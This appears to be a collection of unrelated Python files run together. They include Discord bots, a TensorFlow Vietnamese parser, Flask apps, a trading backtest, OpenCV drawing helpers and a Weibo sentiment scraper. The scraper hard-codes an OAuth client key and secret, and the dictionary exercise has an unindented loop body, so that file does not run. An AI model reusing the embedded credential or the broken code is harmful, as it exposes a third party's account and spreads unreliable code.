        # `embed` unbound for any other size and then crashed on send.
        if len(teampool) not in (4, 6, 8, 10):
            return
        # One shuffle followed by a half/half split is equivalent to the
        # original's repeated shuffle-and-pop loop.
        random.shuffle(teampool)
        half = len(teampool) // 2
        Ateam = teampool[:half]
        Bteam = teampool[half:]
        # BUG FIX: the original concatenated str + list (TypeError);
        # join the player names instead.
        embed = discord.Embed(
            title="Teammake complete",
            description="Ateam: " + ", ".join(Ateam) + '\n' + "Bteam: " + ", ".join(Bteam),
        )
        # BUG FIX: Message has no .send(); reply in the message's channel.
        await message.channel.send(embed=embed)
# Register the cog and start the bot.
# NOTE(review): in discord.py 2.x add_cog is a coroutine and must be awaited
# (e.g. from setup_hook) — confirm the library version in use.
bot.add_cog(Teammake(bot))
bot.run('your token')  # placeholder — supply a real bot token, never commit it
import numpy as np
import gensim
import tensorflow as tf
from os import listdir
import fasttext as ft
# Universal Dependencies POS tag inventory (one-hot label index order).
POS_tag = ['ADJ', 'ADP', 'ADV', 'AUX', 'CCONJ', 'DET', 'INTJ', 'NOUN', 'NUM', 'PART', 'PRON', 'PROPN', 'PUNCT', 'SCONJ', 'SYM', 'VERB', 'X']
# Language-specific (XPOS) tags plus punctuation/noise tokens seen in the corpus.
X_POS_tag = ['H', 'RV', 'N', 'Eb', 'Mb', 'Np', 'm', 'v', 'Nu', 'Nc', 'V', 'A', 'a', 'Ap', 'P', 'p', 'L', 'M', 'R', 'E', 'C', 'I', 'T', 'B', 'Y', 'S', 'X', 'Ny', 'NY', 'Vy', 'Ay', 'Nb', 'Vb', 'Ab', '.', ',', 'LBKT', 'RBKT', 'CC', '"', '...', '@', '-', '!', ':', 'Z', '?', 'NP', ';', 'VP', '(', ')', '“', '”', '[', ']', '…', '/', '----------', '*', '---------', '--------', '----------------', '------', '', '+', '#', '$', '&', '^', '=', '_', '`', '~', '’', '<', '>', '..', 'oOo']
# Dependency-relation label inventory (one-hot label index order).
DP_tag = ['acl', 'advcl', 'advmod', 'amod', 'appos', 'aux', 'auxpass', 'aux:pass', 'case', 'cc', 'ccomp', 'compound', 'conj', 'cop', 'csubj', 'csubjpass', 'dep', 'det', 'discourse', 'dislocated', 'dobj', 'expl', 'fixed', 'flat', 'foreign', 'goeswith', 'iobj', 'obl', 'list', 'mark', 'neg', 'nmod', 'nsubj', 'nsubjpass', 'nummod', 'obj', 'orphan', 'parataxis', 'punct', 'reparandum', 'root', 'vocative', 'xcomp']
# Cached label-vector sizes.
pos_len = len(POS_tag)
dp_len = len(DP_tag)
def load_data(Word2vec, batch_size, f_POS, f_head, f_DP):
    """
    Read the next batch_size sentences from three parallel handles over the
    same CoNLL-style file and build padded training tensors.

    Word2vec: word -> embedding lookup (padding uses np.zeros(100), so
        embeddings are assumed 100-dimensional — TODO confirm).
    f_POS / f_head / f_DP: open file handles consumed incrementally; each
        pass reads word forms (column 1), POS tags (column 3), head indices
        (column 6) and dependency relations (column 7). Non-digit first
        columns mark sentence boundaries/comments.

    Returns (POS_data, POS_labels, head_labels, DP_labels, sequence_length),
    each padded / one-hot encoded to max_state positions per sentence.
    """
    # Maximum sentence length; everything is padded to this many tokens.
    max_state = 150
    ### load data + pos labels
    POS_data = []
    POS_labels = []
    sequence_length = []
    row_data = []
    row_POS_labels = []
    sen_in_batch = 0
    for row in f_POS:
        list_columns = row[:-1].split('\t')
        # A non-numeric first column ends the current sentence.
        if not (list_columns[0].isdigit()):
            if not (len(row_data) == 0):
                sequence_length.append(len(row_data))
                # Pad embeddings and labels out to max_state.
                while len(row_data) < max_state:
                    row_data.append(np.zeros(100))
                    row_POS_labels.append(np.zeros(pos_len))
                POS_data.append(row_data)
                POS_labels.append(row_POS_labels)
                sen_in_batch += 1
                if (sen_in_batch == batch_size):
                    break
                row_data = []
                row_POS_labels = []
            continue
        row_data.append(Word2vec[list_columns[1]])
        # One-hot POS label from column 3.
        label = np.zeros(len(POS_tag))
        label[POS_tag.index(list_columns[3])] = 1
        row_POS_labels.append(label)
    ### load head labels
    head_labels = []
    # row_head_labels[t, h] = 1 means token t's head is token h.
    row_head_labels = np.zeros((max_state, max_state))
    ok = False
    cnt = 0
    sen_in_batch = 0
    for row in f_head:
        list_columns = row[:-1].split('\t')
        if not (list_columns[0].isdigit()):
            if (ok):
                head_labels.append(row_head_labels)
                ok = False
                cnt += 1
                sen_in_batch += 1
                if (sen_in_batch == batch_size):
                    break
                row_head_labels = np.zeros((max_state, max_state))
            continue
        ok = True
        if (int (list_columns[6]) == 0):
            # Head 0 = root: attach to the virtual node just past the sentence end.
            row_head_labels[int (list_columns[0]) - 1, sequence_length[cnt]] = 1
        else:
            row_head_labels[int (list_columns[0]) - 1, int (list_columns[6]) - 1] = 1
    ### load DP labels
    DP_labels = []
    # row_DP_labels[t, h, r] = 1 means arc t->h carries relation r.
    row_DP_labels = np.zeros((max_state, max_state, dp_len))
    ok = False
    cnt = 0
    sen_in_batch = 0
    for row in f_DP:
        list_columns = row[:-1].split('\t')
        if not (list_columns[0].isdigit()):
            if (ok):
                DP_labels.append(row_DP_labels)
                ok = False
                cnt += 1
                sen_in_batch += 1
                if (sen_in_batch == batch_size):
                    break
                row_DP_labels = np.zeros((max_state, max_state, dp_len))
            continue
        ok = True
        if (int (list_columns[6]) == 0):
            # Root arcs point at the virtual end-of-sentence node, as above.
            row_DP_labels[int (list_columns[0]) - 1, sequence_length[cnt], DP_tag.index(list_columns[7])] = 1
        else:
            row_DP_labels[int (list_columns[0]) - 1, int (list_columns[6]) - 1, DP_tag.index(list_columns[7])] = 1
    return POS_data, POS_labels, head_labels, DP_labels, sequence_length
def main():
    """
    Build and train a stacked B-LSTM model (TensorFlow 1.x graph style):
    a POS-tagging B-LSTM whose outputs feed a dependency-parsing B-LSTM
    that predicts head attachments and arc labels jointly.
    """
    ### load word2vec model
    print('load Word2vec model')
    Word2vec = ft.load_model('vi.bin')
    ### make graph
    print('make graph')
    n_hidden = 100 # also n_cell
    max_state = 150
    epochs = 100
    batch_size = 5
    # Inputs: 100-dim word embeddings, one-hot POS/head/arc-label targets,
    # and per-sentence true lengths for the dynamic RNNs.
    x = tf.placeholder(tf.float64, [None, max_state, 100])
    y_POS_ = tf.placeholder(tf.float64, [None, max_state, pos_len])
    y_head_ = tf.placeholder(tf.float64, [None, max_state, max_state])
    y_DP_ = tf.placeholder(tf.float64, [None, max_state, max_state, dp_len])
    sequence_length = tf.placeholder(tf.int64, [None])
    # Projection weights for the POS softmax, head biaffine-style scoring,
    # and the arc-label softmax.
    w_POS = tf.Variable(tf.truncated_normal([2*n_hidden, pos_len], dtype = tf.float64), name = 'w_POS', dtype = tf.float64)
    b_POS = tf.Variable(tf.truncated_normal([1, pos_len], dtype = tf.float64), name = 'b_POS', dtype = tf.float64)
    w_head = tf.Variable(tf.truncated_normal([2*n_hidden, 2*n_hidden], dtype = tf.float64), name = 'w_head', dtype = tf.float64)
    w_DP = tf.Variable(tf.truncated_normal([4*n_hidden, dp_len], dtype = tf.float64), name = 'w_DP', dtype = tf.float64)
    b_DP = tf.Variable(tf.truncated_normal([1, dp_len], dtype = tf.float64), name = 'b_DP', dtype = tf.float64)
    ### POS layer
    fw_lstm_POS = tf.contrib.rnn.LSTMCell(num_units = n_hidden)
    bw_lstm_POS = tf.contrib.rnn.LSTMCell(num_units = n_hidden)
    with tf.variable_scope('POSlayer'):
        (output_fw_POS, output_bw_POS), _ = tf.nn.bidirectional_dynamic_rnn(cell_fw = fw_lstm_POS, cell_bw = bw_lstm_POS, sequence_length = sequence_length, inputs = x, dtype = tf.float64, scope = 'POSlayer')
    # output of B-LSTM also concatenation hidden state
    h_POS = tf.concat([output_fw_POS, output_bw_POS], axis = -1)
    # process output of POS B-LSTM layer
    output_POS_relu = tf.reshape(tf.nn.relu(h_POS), [-1, 2*n_hidden])
    output_POS_slice = tf.nn.softmax(tf.matmul(output_POS_relu, w_POS) + b_POS)
    output_POS = tf.reshape(output_POS_slice, [-1, max_state, pos_len])
    # prepare for next layer: project the POS distribution back into the
    # hidden space via the transposed POS weights.
    y_POS_slice = tf.matmul(output_POS_slice, tf.transpose(w_POS))
    y_POS = tf.reshape(y_POS_slice, [-1, max_state, 2*n_hidden])
    ### dependency parsing layer
    # DP input = POS hidden states + raw embeddings + projected POS predictions.
    x_DP = tf.concat([h_POS, x, y_POS], axis = -1)
    fw_lstm_DP = tf.contrib.rnn.LSTMCell(num_units = n_hidden)
    bw_lstm_DP = tf.contrib.rnn.LSTMCell(num_units = n_hidden)
    with tf.variable_scope('DPlayer'):
        (output_fw_DP, output_bw_DP), _ = tf.nn.bidirectional_dynamic_rnn(cell_fw = fw_lstm_DP, cell_bw = bw_lstm_DP, sequence_length = sequence_length, inputs = x_DP, dtype = tf.float64, scope = 'DPlayer')
    h_DP = tf.concat([output_fw_DP, output_bw_DP], axis = -1)
    h_DP_slice = tf.reshape(h_DP, [-1, 2*n_hidden])
    # process output for head marking: score every (token, candidate-head)
    # pair as h_t . W . h_j and softmax over candidate heads.
    w_h = tf.reshape(tf.matmul(h_DP_slice, w_head), [-1, max_state, 2*n_hidden])
    h_w_h = tf.matmul(h_DP, tf.transpose(w_h, [0, 2, 1]))
    output_head = tf.nn.softmax(h_w_h)
    # process output for Dependency Parsing: concatenate every (h_t, h_j)
    # hidden-state pair and classify the arc label.
    b1 = tf.reshape(tf.tile(h_DP, [1, 1, max_state]), [-1, max_state*max_state, 2*n_hidden])
    b2 = tf.tile(h_DP, [1, max_state, 1])
    ht_hj = tf.concat([b1, b2], axis = -1)
    output_DP_relu = tf.reshape(tf.nn.relu(ht_hj), [-1, 4*n_hidden])
    output_DP_slice = tf.nn.softmax(tf.matmul(output_DP_relu, w_DP) + b_DP)
    output_DP = tf.reshape(output_DP_slice, [-1, max_state, max_state, dp_len])
    ### loss function and optimiers: cross-entropy summed over positions,
    # averaged over the batch, one RMSProp optimizer per sub-task.
    loss_POS = tf.reduce_mean(tf.reduce_sum(-tf.reduce_sum(y_POS_*tf.log(output_POS), axis = 2), axis = 1))
    loss_head = tf.reduce_mean(tf.reduce_sum(-tf.reduce_sum(y_head_*tf.log(output_head), axis = 2), axis = 1))
    loss_DP = tf.reduce_mean(tf.reduce_sum(tf.reduce_sum(-tf.reduce_sum(y_DP_*tf.log(output_DP), axis = 3), axis = 2), axis = 1))
    optimizer_POS = tf.train.RMSPropOptimizer(0.01).minimize(loss_POS)
    optimizer_head = tf.train.RMSPropOptimizer(0.01).minimize(loss_head)
    optimizer_DP = tf.train.RMSPropOptimizer(0.001).minimize(loss_DP)
    ### run models
    sess = tf.InteractiveSession()
    # tf.global_variables_initializer().run()
    saver = tf.train.Saver(max_to_keep = 100)
    # Resumes from the epoch-7 checkpoint instead of initializing fresh
    # (hence the commented initializer above and the range starting at 8).
    saver.restore(sess, './models/0.01-0.01-0.001/model7.ckpt')
    f_loss = open('./models/0.01-0.01-0.001/loss', 'w')
    for epoch in range(8, epochs):
        # Three independent handles over the same file; load_data advances
        # each of them one batch per call.
        f_POS = open('./data/vi-ud-train.conllu', 'r')
        f_head = open('./data/vi-ud-train.conllu', 'r')
        f_DP = open('./data/vi-ud-train.conllu', 'r')
        start = 0
        sum_POS_loss = 0
        sum_head_loss = 0
        sum_DP_loss = 0
        cnt = 0
        while (start <= 1400 - 1):
            start += batch_size
            cnt += 1
            print('batch: ', cnt, end = '\r')
            batch_data, batch_POS_labels, batch_head_labels, batch_DP_labels, batch_seqlen = load_data(Word2vec, batch_size, f_POS, f_head, f_DP)
            sess.run((optimizer_POS, optimizer_head, optimizer_DP), feed_dict = {x: batch_data, y_POS_: batch_POS_labels, y_head_: batch_head_labels, y_DP_: batch_DP_labels, sequence_length: batch_seqlen})
            sum_POS_loss += sess.run(loss_POS, feed_dict = {x: batch_data, y_POS_: batch_POS_labels, sequence_length: batch_seqlen})
            sum_head_loss += sess.run(loss_head, feed_dict = {x: batch_data, y_POS_: batch_POS_labels, y_head_: batch_head_labels, sequence_length: batch_seqlen})
            sum_DP_loss += sess.run(loss_DP, feed_dict = {x: batch_data, y_POS_: batch_POS_labels, y_head_: batch_head_labels, y_DP_: batch_DP_labels, sequence_length: batch_seqlen})
        saver.save(sess, './models/cross_entropy/0.01-0.01-0.001/model' + str(epoch) + '.ckpt')
        f_loss.write('epoch: ' + str(epoch) + ' loss_POS: ' + str(sum_POS_loss) + ' loss_head: ' + str(sum_head_loss) + ' loss_DP: ' + str(sum_DP_loss))
        print('epoch: ', epoch, ' ', 'loss_POS: ', sum_POS_loss, ' loss_head: ', sum_head_loss, ' loss_DP: ', sum_DP_loss)
        f_POS.close()
        f_head.close()
        f_DP.close()
    f_loss.close()
# Script entry point.
if __name__ == '__main__':
    main()
|
"""
Create a dictionary with key value pairs to
represent words (key) and its definition (value)
"""
word_definitions = dict()
word_definitions['agitate'] = 'make (someone) troubled or nervous'
word_definitions['onomatopoeia'] = 'the formation of a word from a sound associated with what is named'
"""
Add several more words and their definitions
Example: word_definitions["Awesome"] = "The feeling of students when they are learning Python"
"""
word_definitions['fascism'] = 'a form of far-right, authoritarian ultranationalism characterized by dictatorial power, forcible suppression of opposition, as well as strong regimentation of society and of the economy'
word_definitions['social darwism'] = 'the theory that individuals, groups, and peoples are subject to the same Darwinian laws of natural selection as plants and animals'
"""
Use square bracket lookup to get the definition of two
words and output them to the console with `print()`
"""
print(word_definitions['fascism'])
print(word_definitions['agitate'])
"""
Loop over the dictionary to get the following output:
The definition of [WORD] is [DEFINITION]
The definition of [WORD] is [DEFINITION]
The definition of [WORD] is [DEFINITION]
"""
for key, value in word_definitions.items():
print(f"The definition of {key} is {value}")
|
from flask_sqlalchemy import SQLAlchemy
from flask import current_app
db = SQLAlchemy()
class DatabaseTables(db.Model):
    """ORM model for the 'flask_app' table: an integer id and a short name."""
    __tablename__ = 'flask_app'
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(80), nullable=False)

    def __init__(self, id, name):
        self.id = id
        self.name = name

    def __repr__(self):
        # BUG FIX: the message read "Name is is" (duplicated word).
        return 'The id is {}, Name is {}'.format(self.id, self.name)
|
from flask import Flask
from respberryController import RespberryController
app=Flask(__name__)
# Health-check / landing route.
@app.route("/")
def hello_world():
    return "hello world"
# Forward a turn command (the <fx> path segment) to the Raspberry Pi controller.
# NOTE(review): `controller` is only assigned inside the __main__ guard below,
# so this view raises NameError when the app is served by a WSGI server that
# imports this module instead of running it as a script — confirm deployment.
@app.route("/turn/<string:fx>")
def index(fx):
    controller.control(fx)
    return "turn " + fx
if __name__ == '__main__':
    controller = RespberryController()
    app.run('0.0.0.0',1234)
# This is a sample Python script.
# Press Umschalt+F10 to execute it or replace it with your code.
# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.
import numpy as np
import pandas as pd
import datetime
import matplotlib as plt
from matplotlib import pyplot as mpl
# --- Strategy parameters -----------------------------------------------------
cumulative_profit = 0.0
tick = 0.00001              # price increment of one tick for this instrument
ticks_to_target = 75        # profit-target distance, in ticks
ticks_to_stop = 1000        # stop-loss distance, in ticks
volume = 96000              # position size
entry_time = '23:10:00'     # session entry (converted to datetime.time below)
entry_price = 0.0 # placeholder: to be filled after entry.
exit_time_start_range = '22:50:00'
exit_time_end_range = '22:59:00'
def string_to_time(from_string):
    """Parse an 'HH:MM:SS' string into a ``datetime.time``.

    :param from_string: time-of-day string in '%H:%M:%S' format
    :return: the corresponding ``datetime.time``
    :raises ValueError: if the string does not match the format
    """
    # strptime yields a full datetime; .time() extracts the time-of-day
    # directly (the original rebuilt it field by field and also reassigned
    # its own parameter, which obscured the flow).
    return datetime.datetime.strptime(from_string, '%H:%M:%S').time()
# Convert the configured session boundaries from strings to datetime.time
# so they compare correctly against the DatetimeIndex's .time values below.
entry_time = string_to_time(entry_time)
exit_time_start_range = string_to_time(exit_time_start_range)
exit_time_end_range = string_to_time(exit_time_end_range)
def target_price(entry_price, ticks_to_target, tick):
    """Profit-target price: entry shifted up by the target distance in ticks."""
    distance = ticks_to_target * tick
    return entry_price + distance
def stop_price(entry_price, ticks_to_stop, tick):
    """Stop-loss price: entry shifted down by the stop distance in ticks."""
    distance = ticks_to_stop * tick
    return entry_price - distance
def timestamp_index_to_time(timestamp):
    """Parse an 'HH:MM:SS' string into a ``datetime.time``.

    NOTE: this duplicates ``string_to_time``; it is kept as a separate
    function so existing callers keep working, but new code should prefer
    one of the two.

    :param timestamp: time-of-day string in '%H:%M:%S' format
    :return: the corresponding ``datetime.time``
    :raises ValueError: if the string does not match the format
    """
    return datetime.datetime.strptime(timestamp, '%H:%M:%S').time()
# targetPrice = targetPrice(entryPrice, ticksToTarget, tick)
# plt.style.use('seaborn')
# mpl.rcParams['font.family'] = 'serif'
# Load tick data; the first column becomes a DatetimeIndex, decimal comma
# handles the European CSV export. NOTE(review): hard-coded Windows path.
data = pd.read_csv('C:/ticks.csv', index_col=0, parse_dates=True, decimal=',')
# Keep only the 'Last' (traded price) column, coerced to float.
data = pd.DataFrame(data['Last'], dtype=float)
data.dropna(inplace=True)
# data.info()
# print(data.tail())
# print(data.head())
# Time-of-day column used for session filtering.
data['Time'] = data.index.time
# data['Position'] = np.where(data['Time'] > entry_time, 1, 0)
# In-position flag: 1 from the evening entry time until the exit window
# opens the next day (the OR covers the midnight wrap-around).
data['Position'] = np.where((data.index.time > entry_time) | (data.index.time < exit_time_start_range), 1, 0)
# Entry marker: first tick where Position flips 0 -> 1.
data['Buy'] = np.where((data['Position'] == 1) & (data['Position'].shift(1) == 0), 1, 0)
# global i
i = 1
buy_date = []
# Number the entry ticks sequentially and, for each new entry, slice out
# the ticks belonging to the previous trade.
for row in data[data['Buy'] == 1].itertuples():
    # row['Buy'] = i
    print(row)
    # row[4] = i
    # Stamp the running trade number into 'Buy' at this entry's timestamp.
    data.loc[row[0], 'Buy'] = i
    buy_date.append(row[0])
    print()
    print(row[4])
    if i > 1:
        # entry_price = row[1]
        # Ticks between the two most recent entries while in position.
        dd = data[(data.index > buy_date[i-2]) & (data.index < buy_date[i-1]) & (data['Position'] == 1)].copy()
        # ddd = dd.loc[:'Last', 'Position', 'Buy']
        dd['Position'] = i-1
        print(dd.tail())
    i = i + 1
    print(i)
# dd = data[(data.index > buy_date[i-2]) & (data.index < buy_date[i-1]) & (data['Position'] == 1)].copy()
# dd['Position'] = i-1
# print(dd.tail())
print(data[data['Buy'] > 0])
print(data.tail())
# !!data['BS Counter'] = np.where((data['Position'] == 1) & (data['Position'].shift(1) == 0), 1, 0)
# data['Buy signal'] = np.where((data.index.time > entry_time) & (data.index.shift(1).time <= entry_time), 1, 0)
# data['Position'] = np.where(data['Timestamp'] > entryTime, 1, 0)
# data['rets'] = np.log(data / data.shift(1))
# data['vola'] = data['rets']
# data['vola'] = data['rets'].rolling(252).std() * np.sqrt(252)
# data[['Last', 'vola']].plot(subplots=True, figsize=(10, 6));
# mpl.show()
# data.info()
print(data.head(180))
|
from GompeiFunctions import load_json, save_json
from Permissions import administrator_perms
from discord.ext import commands
import Config
import pytimeparse
import os
class Automod(commands.Cog):
    """
    Automatic moderation handler.

    Exposes an `.automod` command group with per-feature subgroups
    (messageRate, badWords, mentions, whitespace, ghostPing), each with
    enable/disable toggles persisted through the Config module.
    """
    def __init__(self, bot):
        self.bot = bot

    @commands.group(pass_context=True, case_insensitive=True, aliases=["am"])
    @commands.check(administrator_perms)
    @commands.guild_only()
    async def automod(self, ctx):
        """
        Automod command group
        Usage: .automod <subcommand>

        :param ctx: Context object
        """
        if ctx.invoked_subcommand is None:
            await ctx.send("Not a valid automod command")

    @automod.command(aliases=["i"])
    async def info(self, ctx):
        """
        Sends automod info
        Usage: .automod info

        :param ctx: Context object
        """
        # NOTE(review): response is never populated; Discord rejects empty
        # messages, so this call fails until real content is assembled here.
        response = ""
        await ctx.send(response)

    # Message rate commands
    @automod.group(pass_context=True, case_insensitive=True, aliases=["messageRate", "msgRate", "msgR"])
    async def message_rate(self, ctx):
        """
        Message rate command group
        Usage: .automod messageRate <subcommand>

        :param ctx: Context object
        """
        if ctx.invoked_subcommand is None:
            await ctx.send("Not a valid message rate command")

    @message_rate.command(pass_context=True, name="disable")
    async def message_rate_disable(self, ctx):
        """
        Disables message rate checks
        Usage: .automod messageRate disable

        :param ctx: Context object
        """
        Config.automod_setting_disable("message_rate")
        await ctx.send("Disabled message rate limit")

    @message_rate.command(pass_context=True, name="enable")
    async def message_rate_enable(self, ctx):
        """
        Enables message rate checks
        Usage: .automod messageRate enable

        :param ctx: Context object
        """
        Config.automod_setting_enable("message_rate")
        await ctx.send("Enabled message rate limit")

    @message_rate.command(pass_context=True, name="set")
    async def message_rate_set_rate(self, ctx, rate_limit):
        """
        Sets the rate limit for messages
        Usage: .automod messageRate set <rateLimit>

        :param ctx: Context object
        :param rate_limit: Rate limit in format <number>/<time>
        """
        # NOTE(review): if rate_limit has no "/", find() returns -1 and the
        # slice silently drops the last character — confirm desired handling.
        try:
            number = int(rate_limit[:rate_limit.find("/")])
        except ValueError:
            await ctx.send("Not a valid rate limit format. Format: `<number>/<time>`")
            return

        seconds = pytimeparse.parse(rate_limit[rate_limit.find("/") + 1:])
        if seconds is None:
            await ctx.send("Not a valid time")
            return

        Config.automod_set_message_rate_limit(number, seconds)
        await ctx.send("Updated message rate limit to " + str(number) + " messages per " + str(seconds) + " seconds")

    @message_rate.command(pass_context=True, name="setPunishment")
    async def message_rate_set_punishment(self, ctx, *, punishment: str):
        """
        Sets the punishment for breaking the message rate
        Usage: .automod messageRate punishment

        :param ctx: Context object
        :param punishment: Punishment for member
        """
        # IMPLEMENT
        return

    # Bad words commands
    @automod.group(pass_context=True, case_insensitive=True, aliases=["badWords", "badWord"])
    async def bad_words(self, ctx):
        """
        Bad words command group
        Usage: .automod badWords <subcommand>

        :param ctx: Context object
        """
        if ctx.invoked_subcommand is None:
            await ctx.send("Not a valid bad words command")

    @bad_words.command(pass_context=True, name="disable")
    async def bad_words_disable(self, ctx):
        """
        Disables bad words checks
        Usage: .automod badWords disable

        :param ctx: context object
        """
        Config.automod_setting_disable("bad_words")
        await ctx.send("Disabled bad word filtering")

    @bad_words.command(pass_context=True, name="enable")
    async def bad_words_enable(self, ctx):
        """
        Enables bad words checks
        Usage: .automod badWords enable

        :param ctx: Context object
        """
        Config.automod_setting_enable("bad_words")
        await ctx.send("Enabled bad word filtering")

    # Mention spam commands
    @automod.group(pass_context=True, case_insensitive=True)
    async def mentions(self, ctx):
        """
        Mention spam command group
        Usage: .automod mentions <subcommand>

        :param ctx: Context object
        """
        if ctx.invoked_subcommand is None:
            await ctx.send("Not a valid mention spam command")

    @mentions.command(pass_context=True, name="disable")
    async def mentions_disable(self, ctx):
        """
        Disables mention spam checks
        Usage: .automod mentions disable

        :param ctx: Context object
        """
        Config.automod_setting_disable("mention_spam")
        await ctx.send("Disabled mention spam checking")

    @mentions.command(pass_context=True, name="enable")
    async def mentions_enable(self, ctx):
        """
        Enables mention spam checks
        Usage: .automod mentions enable

        :param ctx: Context object
        """
        Config.automod_setting_enable("mention_spam")
        await ctx.send("Enabled mention spam checking")

    # Whitespace spam commands
    @automod.group(pass_context=True, case_insensitive=True)
    async def whitespace(self, ctx):
        """
        Whitespace spam command group
        Usage: .automod whitespace <subcommand>

        :param ctx: Context object
        """
        if ctx.invoked_subcommand is None:
            await ctx.send("Not a valid whitespace spam command")

    @whitespace.command(pass_context=True, name="disable")
    async def whitespace_disable(self, ctx):
        """
        Disables whitespace spam checks
        Usage: .automod whitespace disable

        :param ctx: Context object
        """
        Config.automod_setting_disable("whitespace")
        await ctx.send("Disabled whitespace spam checking")

    @whitespace.command(pass_context=True, name="enable")
    async def whitespace_enable(self, ctx):
        """
        Enables whitespace spam checks
        Usage: .automod whitespace enable

        :param ctx: Context object
        """
        Config.automod_setting_enable("whitespace")
        await ctx.send("Enabled whitespace spam checking")

    # Ghost ping commands
    @automod.group(pass_context=True, case_insensitive=True, aliases=["ghostPing"])
    async def ghost_ping(self, ctx):
        """
        Ghost ping command group
        Usage: .automod ghostPing <subcommand>

        :param ctx: Context object
        """
        if ctx.invoked_subcommand is None:
            await ctx.send("Not a valid ghost ping command")

    # BUG FIX: these two were registered with @automod.command, which put
    # bare `.automod disable` / `.automod enable` commands on the parent
    # group and made `.automod ghostPing disable|enable` unusable. They now
    # hang off the ghost_ping group like every other feature toggle.
    @ghost_ping.command(pass_context=True, name="disable")
    async def ghost_ping_disable(self, ctx):
        """
        Disables ghost ping checks
        Usage: .automod ghostPing disable

        :param ctx: Context object
        """
        Config.automod_setting_disable("ghost_ping")
        await ctx.send("Disabled ghost ping checking")

    @ghost_ping.command(pass_context=True, name="enable")
    async def ghost_ping_enable(self, ctx):
        """
        Enables ghost ping checks
        Usage: .automod ghostPing enable

        :param ctx: Context object
        """
        Config.automod_setting_enable("ghost_ping")
        await ctx.send("Enabled ghost ping checking")

    # Listeners
    @commands.Cog.listener()
    async def on_message_delete(self, message):
        # Check for ghost pinging
        return

    @commands.Cog.listener()
    async def on_message(self, message):
        # Check for excessive pings, check for rate limit, check for excessive white space, check for blacklisted phrases/words
        return
|
import cv2
import numpy as np
# Directory layout used by the pipeline.
INPUT_PATH = 'input/'
OUTPUT_PATH = 'output/'
POINT_MAPS_PATH = 'point_maps/'
FRAMES_PATH = 'frames/'
# Drawing colors, in OpenCV's BGR channel order.
BLUE = (255, 0, 0)
GREEN = (0, 255, 0)
RED = (0, 0, 255)
def drawInliersOutliers(image, point_map, inliers):
    """
    Render a grayscale image in color with every matched point circled:
    green for inliers, red for outliers.

    inliers: set of (x1, y1, x2, y2) tuples
    """
    h, w = image.shape
    canvas = np.zeros((h, w, 3), dtype='uint8')
    canvas[:, :, :] = np.dstack([image] * 3)
    for x1, y1, x2, y2 in point_map:
        center = (int(x1), int(y1))
        if (x1, y1, x2, y2) in inliers:
            cv2.circle(canvas, center, 4, GREEN, 1)
        else:
            cv2.circle(canvas, center, 4, RED, 1)
    return canvas
def drawMatches(image1, image2, point_map, inliers=None, max_points=1000):
    """
    Stack two grayscale images side by side and draw up to max_points
    randomly sampled correspondences between them.

    inliers: optional set of (x1, y1, x2, y2) tuples; when given, inlier
    lines are green and the rest red, otherwise every line is blue.
    """
    rows1, cols1 = image1.shape
    rows2, cols2 = image2.shape
    canvas = np.zeros((max(rows1, rows2), cols1 + cols2, 3), dtype='uint8')
    canvas[:rows1, :cols1, :] = np.dstack([image1] * 3)
    canvas[:rows2, cols1:cols1 + cols2, :] = np.dstack([image2] * 3)
    # Random subsample (with replacement) to keep the plot readable.
    sampled = [point_map[idx] for idx in np.random.choice(len(point_map), max_points)]
    shift = image1.shape[1]  # x-offset of the right-hand image
    # Connecting lines first ...
    for x1, y1, x2, y2 in sampled:
        left = (int(x1), int(y1))
        right = (int(x2 + shift), int(y2))
        if inliers is None:
            color = BLUE
        elif (x1, y1, x2, y2) in inliers:
            color = GREEN
        else:
            color = RED
        cv2.line(canvas, left, right, color, 1)
    # ... then endpoint circles on top.
    for x1, y1, x2, y2 in sampled:
        cv2.circle(canvas, (int(x1), int(y1)), 5, BLUE, 1)
        cv2.circle(canvas, (int(x2 + shift), int(y2)), 5, BLUE, 1)
    return canvas
from weibopy import WeiboOauth2,WeiboClient
import webbrowser
import json
import re
import time
from collections import defaultdict
from snownlp import SnowNLP
import pandas as pd
import echarts_countries_pypkg,echarts_china_provinces_pypkg
from pyecharts import Map
# NOTE(review): OAuth credentials hard-coded in source — move to env/config.
client_key='3536121960'
client_secret='29a7cb9342f584e7a2fda64124ec01cf'
redirect_url='https://api.weibo.com/oauth2/default.html'
# Interactive OAuth2 flow: open the browser, the user pastes the code back.
auth=WeiboOauth2(client_key,client_secret,redirect_url)
webbrowser.open(auth.authorize_url)
code=input('the code is\n')
token=auth.auth_access(code)
client=WeiboClient(token['access_token'])
# Processing of the fetched content: 1. strip "reply to ..." prefixes,
# 2. bucket comment text by the author's province.
province_list=defaultdict(list)
comment_text_list=[]
# Fetch comment pages for the target status (up to 39 pages).
for i in range(1, 40):
    try:
        # BUG FIX: the original always requested page 1, re-downloading the
        # same comments 39 times; the page now advances with the loop index.
        result = client.get(suffix='comments/show.json',
                            params={'id': 4401542310862649, 'count': 200, 'page': i})
        comments = result['comments']
        if not len(comments):
            break  # no more comments — stop paging
        for comment in comments:
            # Strip "回复@user:" (reply-to) prefixes so only the body remains.
            text = re.sub('回复.*?:', '', str(comment['text']))
            province = comment['user']['province']
            province_list[province].append(text)
            comment_text_list.append(text)
            with open('./tep1.txt', 'a+', encoding='utf-8') as f:
                f.write(text + '\n')
        print('已抓取评论 {} 条'.format(len(comment_text_list)))
        time.sleep(1)  # be polite to the API
    except Exception:
        # Narrowed from a bare `except:` so Ctrl-C still interrupts the loop.
        print('something went wrong')
# Build a province-code -> province-name lookup from the weibo API.
provinces={}
results=client.get(suffix='common/get_province.json',params={'country':'001'})
for prov in results:
    for code,name in prov.items():
        provinces[code]=name
propd=pd.Series(provinces)
propd.to_csv('./pron.csv')
# Average SnowNLP sentiment score (0..1) per province.
positives={}
for province_code,comments in province_list.items():
    sentiment_list=[]
    for text in comments: #comments is a list
        s=SnowNLP(text)
        sentiment_list.append(s.sentiments)
    #each province's attitude
    positive_number=sum(sentiment_list)
    positive=positive_number/len(sentiment_list)
    #print(positive)
    # API province codes are prefixed with the country code '001'.
    province_code='0010'+str(province_code)
    if province_code in provinces:
        province_name=provinces[province_code]
        positives[province_name]=positive
ab=pd.Series(positives)
ab.to_csv('./test.csv')
# Normalize scores to 0..100 relative to the most positive province.
mostp=ab.max()
positives=ab/mostp*100
#print(province_list)
#print(positives)
keys=list(positives.keys())
values=list(positives.values)
# Render a choropleth of per-province sentiment with pyecharts.
map=Map('surpriseme',width=1200,height=600)
